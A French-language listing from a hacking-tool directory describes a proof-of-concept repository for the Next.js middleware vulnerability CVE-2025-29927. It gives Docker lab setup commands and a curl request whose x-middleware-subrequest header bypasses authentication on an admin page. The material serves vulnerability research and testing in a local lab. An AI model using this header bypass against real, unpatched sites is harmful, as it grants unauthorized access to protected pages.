Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nextjs-middleware-exploit — Recherche sur la vulnérabilité du middleware Next.js (CVE-2025-29927) permettant un contournement d'autorisation et des exploits potentiels. | Kitploit
Outils/GitHubGitHub/l1uk/nextjs-middleware-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Recherche sur la vulnérabilité du middleware Next.js (CVE-2025-29927) permettant un contournement d'autorisation et des exploits potentiels.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Recherche sur la vulnérabilité du middleware Next.js (CVE-2025-29927)

Ce dépôt démontre une vulnérabilité critique dans le middleware Next.js (CVE-2025-29927), qui affecte les versions 11.1.4 à 15.1.7. Cette vulnérabilité permet un contournement de l'autorisation, un contournement de la CSP, et d'éventuelles attaques DoS par empoisonnement du cache. Le problème provient de la manière dont l'en-tête x-middleware-subrequest est géré, permettant aux attaquants de contourner les mécanismes de protection du middleware.

Cette preuve de concept est spécifique à la vulnérabilité dans v12

Utilisation

Configuration de l'environnement

Configurez l'environnement vulnérable à l'aide de Docker et des fichiers de ce dépôt en exécutant :

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Exploitation

Ce dépôt contient déjà le script exploit.sh créé pour tester l'exploitation de la vulnérabilité. Pour le tester, exécutez :

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

De plus, vous pouvez tester l'exploitation de la vulnérabilité en essayant ce qui suit :

  1. Demandez la page admin sans authentification. Vous devriez obtenir une redirection vers la page login.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Demandez la page sans authentification mais en utilisant l'en-tête x-middleware-subrequest. Vous devriez pouvoir contourner la page d'authentification.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Avis de sécurité

  • CVE-2025-29927 : Lien de l'avis de sécurité
Télécharger l’outil